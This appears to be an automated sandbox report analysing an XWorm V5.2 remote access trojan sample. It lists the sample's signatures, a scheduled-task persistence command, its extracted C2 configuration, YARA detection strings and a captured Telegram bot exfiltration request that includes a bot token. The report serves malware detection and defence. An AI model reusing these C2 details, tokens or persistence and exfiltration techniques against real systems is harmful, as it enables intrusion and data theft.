Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
XClient.exe.bin.exe

Overview

General Information

Sample name:XClient.exe.bin.exe
Analysis ID:1637332
MD5:5d963e15d3b0a19ffc51dd8eb6560505
SHA1:132a227fafd2d630fae7c3b5b34efb5186a50d31
SHA256:a0de7218ac117e5026b352ecc3f783c5786982af49625ba1b32feb08fe967c7b
Tags:exeuser-TornadoAV_dev
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Drops PE files to the user root directory
Joe Sandbox ML detected suspicious sample
Opens the same file many times (likely Sandbox evasion)
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • XClient.exe.bin.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\XClient.exe.bin.exe" MD5: 5D963E15D3B0A19FFC51DD8EB6560505)
    • schtasks.exe (PID: 6196 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "checkcoin" /tr "C:\Users\user\checkcoin" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • checkcoin (PID: 6552 cmdline: C:\Users\user\checkcoin MD5: 5D963E15D3B0A19FFC51DD8EB6560505)
  • OpenWith.exe (PID: 2780 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • OpenWith.exe (PID: 6556 cmdline: C:\Windows\system32\OpenWith.exe -Embedding MD5: E4A834784FA08C17D47A1E72429C5109)
  • checkcoin (PID: 6432 cmdline: C:\Users\user\checkcoin MD5: 5D963E15D3B0A19FFC51DD8EB6560505)
  • checkcoin (PID: 1488 cmdline: C:\Users\user\checkcoin MD5: 5D963E15D3B0A19FFC51DD8EB6560505)
  • checkcoin (PID: 2968 cmdline: C:\Users\user\checkcoin MD5: 5D963E15D3B0A19FFC51DD8EB6560505)
  • checkcoin (PID: 5660 cmdline: C:\Users\user\checkcoin MD5: 5D963E15D3B0A19FFC51DD8EB6560505)
  • cleanup
{"C2 url": ["https://doberman-proper-bengal.ngrok-free.app"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
SourceRuleDescriptionAuthorStrings
XClient.exe.bin.exeJoeSecurity_XWormYara detected XWormJoe Security
    XClient.exe.bin.exerat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
    • 0x78b0:$str01: $VB$Local_Port
    • 0x78a1:$str02: $VB$Local_Host
    • 0x7a86:$str03: get_Jpeg
    • 0x75ba:$str04: get_ServicePack
    • 0x8b0e:$str05: Select * from AntivirusProduct
    • 0x8d0a:$str06: PCRestart
    • 0x8d1e:$str07: shutdown.exe /f /r /t 0
    • 0x8dd0:$str08: StopReport
    • 0x8da6:$str09: StopDDos
    • 0x8ea8:$str10: sendPlugin
    • 0x9054:$str12: -ExecutionPolicy Bypass -File "
    • 0x9179:$str13: Content-length: 5235
    XClient.exe.bin.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x9538:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x95d5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x96ea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x9094:$cnc4: POST / HTTP/1.1
    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\checkcoinJoeSecurity_XWormYara detected XWormJoe Security
        C:\Users\user\checkcoinrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
        • 0x78b0:$str01: $VB$Local_Port
        • 0x78a1:$str02: $VB$Local_Host
        • 0x7a86:$str03: get_Jpeg
        • 0x75ba:$str04: get_ServicePack
        • 0x8b0e:$str05: Select * from AntivirusProduct
        • 0x8d0a:$str06: PCRestart
        • 0x8d1e:$str07: shutdown.exe /f /r /t 0
        • 0x8dd0:$str08: StopReport
        • 0x8da6:$str09: StopDDos
        • 0x8ea8:$str10: sendPlugin
        • 0x9054:$str12: -ExecutionPolicy Bypass -File "
        • 0x9179:$str13: Content-length: 5235
        C:\Users\user\checkcoinMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x9538:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x95d5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x96ea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x9094:$cnc4: POST / HTTP/1.1
        SourceRuleDescriptionAuthorStrings
        00000000.00000002.3307394999.0000000013011000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
          00000000.00000002.3307394999.0000000013011000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x11ff8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x12095:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x121aa:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x11b54:$cnc4: POST / HTTP/1.1
          00000000.00000000.837866590.0000000000D82000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000000.00000000.837866590.0000000000D82000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x9338:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x93d5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x94ea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x8e94:$cnc4: POST / HTTP/1.1
            Process Memory Space: XClient.exe.bin.exe PID: 7084JoeSecurity_XWormYara detected XWormJoe Security
              Click to see the 1 entries
              SourceRuleDescriptionAuthorStrings
              0.0.XClient.exe.bin.exe.d80000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                0.0.XClient.exe.bin.exe.d80000.0.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
                • 0x78b0:$str01: $VB$Local_Port
                • 0x78a1:$str02: $VB$Local_Host
                • 0x7a86:$str03: get_Jpeg
                • 0x75ba:$str04: get_ServicePack
                • 0x8b0e:$str05: Select * from AntivirusProduct
                • 0x8d0a:$str06: PCRestart
                • 0x8d1e:$str07: shutdown.exe /f /r /t 0
                • 0x8dd0:$str08: StopReport
                • 0x8da6:$str09: StopDDos
                • 0x8ea8:$str10: sendPlugin
                • 0x9054:$str12: -ExecutionPolicy Bypass -File "
                • 0x9179:$str13: Content-length: 5235
                0.0.XClient.exe.bin.exe.d80000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0x9538:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x95d5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x96ea:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0x9094:$cnc4: POST / HTTP/1.1
                0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
                  0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
                  • 0x78b0:$str01: $VB$Local_Port
                  • 0x78a1:$str02: $VB$Local_Host
                  • 0x7a86:$str03: get_Jpeg
                  • 0x75ba:$str04: get_ServicePack
                  • 0x8b0e:$str05: Select * from AntivirusProduct
                  • 0x8d0a:$str06: PCRestart
                  • 0x8d1e:$str07: shutdown.exe /f /r /t 0
                  • 0x8dd0:$str08: StopReport
                  • 0x8da6:$str09: StopDDos
                  • 0x8ea8:$str10: sendPlugin
                  • 0x9054:$str12: -ExecutionPolicy Bypass -File "
                  • 0x9179:$str13: Content-length: 5235
                  Click to see the 4 entries

                  System Summary

                  barindex
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\checkcoin, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\XClient.exe.bin.exe, ProcessId: 7084, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\checkcoin
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\checkcoin, CommandLine: C:\Users\user\checkcoin, CommandLine|base64offset|contains: , Image: C:\Users\user\checkcoin, NewProcessName: C:\Users\user\checkcoin, OriginalFileName: C:\Users\user\checkcoin, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Users\user\checkcoin, ProcessId: 6552, ProcessName: checkcoin
                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\XClient.exe.bin.exe, ProcessId: 7084, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\checkcoin.lnk
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-13T14:41:46.886630+010028536851A Network Trojan was detected192.168.2.749681149.154.167.220443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-03-13T14:41:46.886630+010018100071Potentially Bad Traffic192.168.2.749681149.154.167.220443TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: XClient.exe.bin.exeAvira: detected
                  Source: C:\Users\user\checkcoinAvira: detection malicious, Label: TR/Spy.Gen
                  Source: XClient.exe.bin.exeMalware Configuration Extractor: Xworm {"C2 url": ["https://doberman-proper-bengal.ngrok-free.app"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
                  Source: C:\Users\user\checkcoinReversingLabs: Detection: 78%
                  Source: XClient.exe.bin.exeVirustotal: Detection: 72%Perma Link
                  Source: XClient.exe.bin.exeReversingLabs: Detection: 78%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: XClient.exe.bin.exeString decryptor: https://doberman-proper-bengal.ngrok-free.app
                  Source: XClient.exe.bin.exeString decryptor: 7000
                  Source: XClient.exe.bin.exeString decryptor: <123456789>
                  Source: XClient.exe.bin.exeString decryptor: <Xwormmm>
                  Source: XClient.exe.bin.exeString decryptor: XWorm V5.2
                  Source: XClient.exe.bin.exeString decryptor: USB.exe
                  Source: XClient.exe.bin.exeString decryptor: %Userprofile%
                  Source: XClient.exe.bin.exeString decryptor: checkcoin
                  Source: XClient.exe.bin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49681 version: TLS 1.2
                  Source: XClient.exe.bin.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49681 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.7:49681 -> 149.154.167.220:443
                  Source: Malware configuration extractorURLs: https://doberman-proper-bengal.ngrok-free.app
                  Source: unknownDNS query: name: api.telegram.org
                  Source: global trafficHTTP traffic detected: GET /bot7869137595:AAFxR2yOwe3zrtEQ2gHmo2UJsjisFBJbvSI/sendMessage?chat_id=7795104560&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AD38424BBC747D266F23E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20YWDU7Z%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /bot7869137595:AAFxR2yOwe3zrtEQ2gHmo2UJsjisFBJbvSI/sendMessage?chat_id=7795104560&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AD38424BBC747D266F23E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20YWDU7Z%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.18.0Date: Thu, 13 Mar 2025 13:41:46 GMTContent-Type: application/jsonContent-Length: 84Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: XClient.exe.bin.exe, 00000000.00000002.3305389596.0000000003011000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: XClient.exe.bin.exe, checkcoin.0.drString found in binary or memory: https://api.telegram.org/bot
                  Source: checkcoin, 00000014.00000002.2903960216.00000000023E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://doberman-proper-bengal.ngrok-free.app
                  Source: XClient.exe.bin.exe, 00000000.00000002.3308128690.000000001BFB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doberman-proper-bengal.ngrok-free.app-
                  Source: XClient.exe.bin.exe, 00000000.00000002.3308439265.000000001C03B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doberman-proper-bengal.ngrok-free.app5
                  Source: XClient.exe.bin.exe, 00000000.00000002.3308439265.000000001C03B000.00000004.00000020.00020000.00000000.sdmp, XClient.exe.bin.exe, 00000000.00000002.3308128690.000000001BFB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doberman-proper-bengal.ngrok-free.app=
                  Source: XClient.exe.bin.exe, 00000000.00000002.3308439265.000000001C03B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doberman-proper-bengal.ngrok-free.appB9
                  Source: XClient.exe.bin.exe, 00000000.00000002.3308439265.000000001C03B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doberman-proper-bengal.ngrok-free.appB95
                  Source: XClient.exe.bin.exe, 00000000.00000002.3308128690.000000001BFB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doberman-proper-bengal.ngrok-free.appM
                  Source: XClient.exe.bin.exe, 00000000.00000002.3308128690.000000001BFB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doberman-proper-bengal.ngrok-free.appm
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49681
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49681 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: XClient.exe.bin.exe, XLogger.cs.Net Code: KeyboardLayout
                  Source: checkcoin.0.dr, XLogger.cs.Net Code: KeyboardLayout
                  Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                  Operating System Destruction

                  barindex
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess information set: 01 00 00 00 Jump to behavior

                  System Summary

                  barindex
                  Source: XClient.exe.bin.exe, type: SAMPLEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                  Source: XClient.exe.bin.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.0.XClient.exe.bin.exe.d80000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                  Source: 0.0.XClient.exe.bin.exe.d80000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                  Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 0.2.XClient.exe.bin.exe.13019ac0.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                  Source: 0.2.XClient.exe.bin.exe.13019ac0.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000000.00000002.3307394999.0000000013011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000000.00000000.837866590.0000000000D82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\checkcoin, type: DROPPEDMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                  Source: C:\Users\user\checkcoin, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeCode function: 0_2_00007FFB9AA47EA60_2_00007FFB9AA47EA6
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeCode function: 0_2_00007FFB9AA48C520_2_00007FFB9AA48C52
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeCode function: 0_2_00007FFB9AA4156A0_2_00007FFB9AA4156A
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeCode function: 0_2_00007FFB9AA40EE00_2_00007FFB9AA40EE0
                  Source: C:\Users\user\Desktop\XClient.exe.bin.exeCode function: 0_2_00007FFB9AA41DB50_2_00007FFB9AA41DB5
                  Source: C:\Users\user\checkcoinCode function: 3_2_00007FFB9AA31DB53_2_00007FFB9AA31DB5
                  Source: C:\Users\user\checkcoinCode function: 3_2_00007FFB9AA3156A3_2_00007FFB9AA3156A
                  Source: C:\Users\user\checkcoinCode function: 7_2_00007FFB9AA61DB57_2_00007FFB9AA61DB5
                  Source: C:\Users\user\checkcoinCode function: 7_2_00007FFB9AA6156A7_2_00007FFB9AA6156A
                  Source: C:\Users\user\checkcoinCode function: 15_2_00007FFB9AA41DB515_2_00007FFB9AA41DB5
                  Source: C:\Users\user\checkcoinCode function: 15_2_00007FFB9AA4156A15_2_00007FFB9AA4156A
                  Source: C:\Users\user\checkcoinCode function: 18_2_00007FFB9AA61DB518_2_00007FFB9AA61DB5
                  Source: C:\Users\user\checkcoinCode function: 18_2_00007FFB9AA6156A18_2_00007FFB9AA6156A
                  Source: C:\Users\user\checkcoinCode function: 20_2_00007FFB9AA71DB520_2_00007FFB9AA71DB5
                  Source: C:\Users\user\checkcoinCode function: 20_2_00007FFB9AA7156A20_2_00007FFB9AA7156A
                  Source: XClient.exe.bin.exe, 00000000.00000002.3307394999.0000000013011000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs XClient.exe.bin.exe
                  Source: XClient.exe.bin.exe, 00000000.00000002.3302740018.000000000124C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs XClient.exe.bin.exe
                  Source: XClient.exe.bin.exe, 00000000.00000000.837886616.0000000000D8E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs XClient.exe.bin.exe
                  Source: XClient.exe.bin.exeBinary or memory string: OriginalFilenameXClient.exe4 vs XClient.exe.bin.exe
                  Source: XClient.exe.bin.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: XClient.exe.bin.exe, type: SAMPLEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                  Source: XClient.exe.bin.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.0.XClient.exe.bin.exe.d80000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                  Source: 0.0.XClient.exe.bin.exe.d80000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                  Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 0.2.XClient.exe.bin.exe.13019ac0.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                  Source: 0.2.XClient.exe.bin.exe.13019ac0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000000.00000002.3307394999.0000000013011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 00000000.00000000.837866590.0000000000D82000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: C:\Users\user\checkcoin, type: DROPPEDMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                  Source: C:\Users\user\checkcoin, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: XClient.exe.bin.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: XClient.exe.bin.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: XClient.exe.bin.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                  Source: checkcoin.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: checkcoin.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: checkcoin.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                  Source: XClient.exe.bin.exe, Settings.csBase64 encoded string: 'XlqRI871NV4HjiTBdLG6vPDYZvTk226ejywJUVnaMrjycvVz8DwGYMTDgjeHEjCj', 'kZwQW6p2Ywp4q1oU06zLrVA57awHOcoEWpr6w7w7SpcV05hZHUhxs+FTiW6fHpE2', 'IxBejiTC3AmRynPOqJJOnpCZUlQRDnBxeqwp/MYh9YLabI1/8TQ+yBMR1CD5kkl1', '+agVRd7GXXKa6tObpCAdBdve9YblloX80BGNwkHocdL8heshE/OLhnOBuYQjzF3S'
                  Source: checkcoin.0.dr, Settings.csBase64 encoded string: 'XlqRI871NV4HjiTBdLG6vPDYZvTk226ejywJUVnaMrjycvVz8DwGYMTDgjeHEjCj', 'kZwQW6p2Ywp4q1oU06zLrVA57awHOcoEWpr6w7w7SpcV05hZHUhxs+FTiW6fHpE2', 'IxBejiTC3AmRynPOqJJOnpCZUlQRDnBxeqwp/MYh9YLabI1/8TQ+yBMR1CD5kkl1', '+agVRd7GXXKa6tObpCAdBdve9YblloX80BGNwkHocdL8heshE/OLhnOBuYQjzF3S'
                  Source: 0.2.XClient.exe.bin.exe.13019ac0.0.raw.unpack, Settings.csBase64 encoded string: 'XlqRI871NV4HjiTBdLG6vPDYZvTk226ejywJUVnaMrjycvVz8DwGYMTDgjeHEjCj', 'kZwQW6p2Ywp4q1oU06zLrVA57awHOcoEWpr6w7w7SpcV05hZHUhxs+FTiW6fHpE2', 'IxBejiTC3AmRynPOqJJOnpCZUlQRDnBxeqwp/MYh9YLabI1/8TQ+yBMR1CD5kkl1', '+agVRd7GXXKa6tObpCAdBdve9YblloX80BGNwkHocdL8heshE/OLhnOBuYQjzF3S'
